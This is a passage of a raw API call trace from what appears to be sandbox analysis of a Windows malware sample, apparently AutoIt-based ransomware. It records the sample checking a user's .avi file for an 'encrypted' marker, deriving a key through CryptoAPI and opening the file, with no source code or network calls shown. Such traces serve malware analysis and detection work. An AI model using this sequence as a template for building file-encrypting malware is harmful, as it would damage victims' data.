lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.570] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.570] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0043.570] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.570] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0043.570] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0043.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.570] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.570] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.570] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.570] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e74b20, ftCreationTime.dwHighDateTime=0x1d5bb8b, ftLastAccessTime.dwLowDateTime=0xdefd32c0, ftLastAccessTime.dwHighDateTime=0x1d5be59, ftLastWriteTime.dwLowDateTime=0xdefd32c0, ftLastWriteTime.dwHighDateTime=0x1d5be59, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MB6 kn.avi", cAlternateFileName="MB6KN~1.AVI")) returned 0x7c20c0 [0043.570] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.571] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e74b20, ftCreationTime.dwHighDateTime=0x1d5bb8b, ftLastAccessTime.dwLowDateTime=0xdefd32c0, ftLastAccessTime.dwHighDateTime=0x1d5be59, ftLastWriteTime.dwLowDateTime=0xdefd32c0, ftLastWriteTime.dwHighDateTime=0x1d5be59, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0x0, dwReserved1=0x777648, cFileName="MB6 kn.avi", cAlternateFileName="MB6KN~1.AVI")) returned 0x7c20c0 [0043.571] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0043.571] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HpWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pWJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WJR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JR_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oOAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aw\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MB6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6 kn.avi\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.573] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.573] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.573] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.573] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.573] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.573] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.573] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.573] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.573] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.573] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66e74b20, ftCreationTime.dwHighDateTime=0x1d5bb8b, ftLastAccessTime.dwLowDateTime=0xdefd32c0, ftLastAccessTime.dwHighDateTime=0x1d5be59, ftLastWriteTime.dwLowDateTime=0xdefd32c0, ftLastWriteTime.dwHighDateTime=0x1d5be59, nFileSizeHigh=0x0, nFileSizeLow=0x6c58, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="MB6 kn.avi", cAlternateFileName="MB6KN~1.AVI")) returned 0x7c2240 [0043.573] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.573] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.573] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.576] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.577] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.577] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.577] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.578] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.578] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.578] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.578] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.578] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.578] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.579] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.579] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.579] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0043.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.579] CryptDestroyHash (hHash=0x7c2100) returned 1 [0043.579] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\MB6 kn.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\mb6 kn.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.579] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.579] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.579] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.579] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0043.580] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.580] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.580] RtlAllocateHeap 